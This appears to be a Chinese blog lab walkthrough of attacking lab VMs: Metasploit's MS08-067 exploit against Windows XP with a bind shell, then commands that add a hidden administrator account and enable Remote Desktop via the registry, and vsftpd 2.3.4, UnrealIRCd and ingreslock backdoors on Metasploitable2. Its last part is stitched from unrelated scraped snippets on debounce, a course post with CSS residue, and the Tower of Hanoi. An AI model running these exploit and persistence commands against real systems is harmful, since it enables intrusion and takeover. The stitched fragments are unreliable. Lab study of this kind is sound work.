攻防具體實踐(1)

2021-12-29 21:31:25 字數 2210 閱讀 7206

一、kali linux黑掉windowsxp

1.首先,在kali用命令 msfconsole 開啟metasploit。

2.然後執行如下命令:useexploit/windows/smb/ms08_067_netapi#使用ms08067漏洞攻擊程式set lhost 192.168.234.128 #設定本地主機ipset rhost192.168.234.132 #設定目標主機ipset payload windows/shell_bind_tcp#設定payloadshow options #檢視設定資訊exploit #實施攻擊由圖可知,攻擊成功,我們得到了乙個cmdshell,接下來就是新建賬戶了。

3.新增使用者名為yangyan,密碼為yangyan的使用者,並把zeal使用者新增到管理組,執行語句:net user yangyan yangyan /add && net localgroup administratorsyangyan /add

4.接下來執行命令 netstat -an 看一下目標主機開放埠的情況

5.發現並沒有開啟3389(遠端桌面連線埠),我們需要手動開啟。需要執行命令:reg add hklm\system\currentcontrolset\control\terminal」「server /v fdenytsconnections /t reg_dword /d 0 /f

這時我們開啟目標機windowsxp發現多了乙個管理員使用者「yangyan」,這就是剛剛我在攻擊機kalilinux建立的。

7.入侵成功

8.接下來就在windowsxp靶機上進入各種破壞,比如我在c盤建立乙個名為test的檔案

回到靶機windows中發現建立成功(刪除靶機裡的檔案同理)

二、利用metasploitable2linux漏洞入侵

1.metasploitable2 在21埠上執行著vsftpd服務,乙個使用廣泛的ftp服務。這個特別的版本包含乙個後門允許乙個未知的入侵者進入核心**。這個版本的後門會在6200埠上開啟乙個監聽的shell。

(1)首先在kali虛擬機器中啟動metasploit的服務

(2)啟動metasploit後,在命令列中輸search vsftp以尋找利用工具

(3)在metasploit中輸入useexploit/unix/ftp/vsftpd_234_backdoor,同時輸入show options,以檢視設定選項,然後設定ip,setrhost 192.168.234.129,最後輸入命令exploit,

(4)輸入exploit之後,已連線至metasploitable2的靶機後門,可以輸入任意命令進行檢視

2. 在metasploitable2 的6667埠上執行著unreaircd irc的守護程序。通過在乙個系統命令後面新增兩個字母」ab「傳送給被攻擊伺服器任意乙個監聽該埠來觸發。metasploit上已經已經有攻擊模組來獲得乙個互動的shell。

3. 在少數伺服器上存在乙個古老的令人驚訝的「ingreslock」後門,監聽1524埠。在過去的十年裡,它經常被用於入侵乙個暴露的伺服器。試驗如下:

debounce的具體實踐

背景 優化搜尋框的功能,在輸入過程中,可以實時動態進行搜尋,但是為了提高搜尋效率,頻繁進行查詢,需要進行防抖 解決辦法 在輸入過程中,在一定時間內沒有輸入,再進行查詢,採用debounce 因此在程式設計時,需要注意兩點 第一 監聽輸入資料的變化,觸發搜尋 監聽一般想到的是watch 第二 進行防抖...

網路攻防實踐第九周

markdownpad document body body first child body last child p,blockquote,ul,ol,dl,table,pre h1,h2,h3,h4,h5,h6 h1 tt,h1 code,h2 tt,h2 code,h3 tt,h3 code...

具體數學 1

漢諾塔 漢諾塔 又稱河內塔 問題是源於印度乙個古老傳說的益智玩具。大梵天創造世界的時候做了三根金剛石柱子,在一根柱子上從下往上按照大小順序摞著64片 圓盤。大梵天命令婆羅門把圓盤從下面開始按大小順序重新擺放在另一根柱子上。並且規定,在小圓盤上不能放大圓盤,在三根柱子之間一次只能移動乙個圓盤。問 n ...